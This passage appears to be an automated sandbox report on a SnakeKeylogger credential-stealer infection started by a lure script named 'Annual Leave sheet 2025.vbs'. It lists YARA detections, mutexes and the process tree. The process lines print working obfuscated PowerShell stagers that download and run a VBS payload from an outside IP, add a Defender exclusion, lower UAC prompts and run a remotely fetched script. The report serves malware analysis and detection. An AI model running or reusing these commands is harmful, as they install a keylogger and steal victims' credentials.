                  Source: 59.2.powershell.exe.60d0b68.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 59.2.powershell.exe.60d0b68.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 22.2.powershell.exe.a380b24.16.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 79.2.powershell.exe.5a399e0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 79.2.powershell.exe.5a399e0.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 22.2.powershell.exe.5ce0820.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 22.2.powershell.exe.5ce0820.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 79.2.powershell.exe.5a119c0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 79.2.powershell.exe.5a119c0.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0000003B.00000002.3066006741.00000000060F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000016.00000002.2757820569.0000000005CC7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0000001E.00000002.2835678297.000000000A5FF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0000001E.00000002.2774533305.0000000005F5C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000016.00000002.2828264055.00000000096F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000016.00000002.2828264055.00000000096F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0000004F.00000002.3322494498.00000000059E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0000003B.00000002.3191009735.000000000A6E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000016.00000002.2757820569.0000000005BEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0000003B.00000002.3066006741.00000000060A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0000004F.00000002.3322494498.0000000005A39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0000001E.00000002.2774533305.0000000005F0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000016.00000002.2829296591.000000000A338000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0000004F.00000002.3451596999.000000000A135000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: powershell.exe PID: 1276, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: powershell.exe PID: 7628, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: powershell.exe PID: 7628, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: powershell.exe PID: 8000, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: powershell.exe PID: 8000, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: powershell.exe PID: 4696, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: 22.2.powershell.exe.a16893c.11.raw.unpack, tjjjj.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 22.2.powershell.exe.a6c382c.7.raw.unpack, tjjjj.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 22.2.powershell.exe.96e0000.3.raw.unpack, tjjjj.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 22.2.powershell.exe.96f0000.4.raw.unpack, UltraSpeed.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 22.2.powershell.exe.96f0000.4.raw.unpack, COVIDPickers.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 22.2.powershell.exe.a15e2d4.12.raw.unpack, tjjjj.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 22.2.powershell.exe.5c92f18.1.raw.unpack, UltraSpeed.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 22.2.powershell.exe.5c92f18.1.raw.unpack, COVIDPickers.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 22.2.powershell.exe.a6a0b58.8.raw.unpack, tjjjj.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 22.2.powershell.exe.5ce0820.0.raw.unpack, UltraSpeed.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 22.2.powershell.exe.5ce0820.0.raw.unpack, COVIDPickers.csCryptographic APIs: 'TransformFinalBlock'
                  Source: DeviceCredentialDeployment.exe, 00000005.00000002.2152293310.000001F244F19000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;.VBP'
                  Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBS@104/89@5/6
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\nova_kaycee[1].vbsJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7340:120:WilError_03
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8000
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4500:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4428:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7040:120:WilError_03
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7892
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7904:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6224:120:WilError_03
                  Source: C:\Windows\System32\DeviceCredentialDeployment.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5852:120:WilError_03
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7628
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7812:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4836:120:WilError_03
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4696
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7592:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7956:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6592:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4440:120:WilError_03
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:984:120:WilError_03
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7564
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7044
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7548:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5996:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3792:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7888:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4244:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4952:120:WilError_03
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_it50rxs1.rwm.ps1Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\c.bat" "
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Annual Leave sheet 2025.vbs"
                  Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: Annual Leave sheet 2025.vbsVirustotal: Detection: 8%
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Annual Leave sheet 2025.vbs"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C poWeRSHELL.eXe -EX uNrEsTRICtEd -nOp -w 1 -c DEvIcECREDentiaLdEplOyMEnT ; InvOke-eXpRESsIOn($(invOke-EXpResSioN('[sYstEm.texT.ENcOdiNg]'+[ChaR]0x3A+[cHar]0x3a+'Utf8.gEtSTrING([systEm.convERt]'+[CHAR]0x3A+[cHar]0X3a+'fRomBAse64strINg('+[ChAr]34+'DQogICAgICAgICRXZEFSayA9IEFEZC10eVBlIC1NZW1CZVJkRUZJbklUSU9uICdbRGxsSW1wb3J0KCJ1UkxNb04iLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIHpXLCBzdHJpbmcgSHl0bFlaR3dPRlQsIHN0cmluZyB0c3RmeVUsIHVpbnQgb2xhbEJOTmZMU0ssIEludFB0ciBUaUxpKTsnIC1uQW1lICJwdWxoY0d2aUFQIiAtTkFNRXNwYUNlIFBhc1FJd3BEWSAtUGFzc1RocnU7IA0KICAgICAgICAkV2RBUms6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly80NS4yMDAuMTQ5LjEwNDo1MDAwL2Rvd25sb2FkL25vdmFfa2F5Y2VlLnZicyIsIiRlTlY6QVBQREFUQVx3aW5kb3dzdXBkYXRlLnZiUyIsMCwwKTsgDQogICAgICAgIHNUQXJULXNMZUVwKDMpOyANCiAgICAgICAgaW5Wb0tlLWVYcHJFc1NpT24gIiRFTnY6QVBQREFUQVx3aW5kb3dzdXBkYXRlLnZiUyINCiAgICAgICAg'+[cHAr]0X22+'))')))"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWeRSHELL.eXe -EX uNrEsTRICtEd -nOp -w 1 -c DEvIcECREDentiaLdEplOyMEnT ; InvOke-eXpRESsIOn($(invOke-EXpResSioN('[sYstEm.texT.ENcOdiNg]'+[ChaR]0x3A+[cHar]0x3a+'Utf8.gEtSTrING([systEm.convERt]'+[CHAR]0x3A+[cHar]0X3a+'fRomBAse64strINg('+[ChAr]34+'DQogICAgICAgICRXZEFSayA9IEFEZC10eVBlIC1NZW1CZVJkRUZJbklUSU9uICdbRGxsSW1wb3J0KCJ1UkxNb04iLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIHpXLCBzdHJpbmcgSHl0bFlaR3dPRlQsIHN0cmluZyB0c3RmeVUsIHVpbnQgb2xhbEJOTmZMU0ssIEludFB0ciBUaUxpKTsnIC1uQW1lICJwdWxoY0d2aUFQIiAtTkFNRXNwYUNlIFBhc1FJd3BEWSAtUGFzc1RocnU7IA0KICAgICAgICAkV2RBUms6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly80NS4yMDAuMTQ5LjEwNDo1MDAwL2Rvd25sb2FkL25vdmFfa2F5Y2VlLnZicyIsIiRlTlY6QVBQREFUQVx3aW5kb3dzdXBkYXRlLnZiUyIsMCwwKTsgDQogICAgICAgIHNUQXJULXNMZUVwKDMpOyANCiAgICAgICAgaW5Wb0tlLWVYcHJFc1NpT24gIiRFTnY6QVBQREFUQVx3aW5kb3dzdXBkYXRlLnZiUyINCiAgICAgICAg'+[cHAr]0X22+'))')))"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\DeviceCredentialDeployment.exe "C:\Windows\system32\DeviceCredentialDeployment.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ilcg05nv.cmdline"
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES509F.tmp" "c:\Users\user\AppData\Local\Temp\CSC8F7BB283C99B46799FCDCA9D84A75A0.TMP"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\windowsupdate.vbS"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\c.bat" "
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Local\Temp\c.bat"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2Z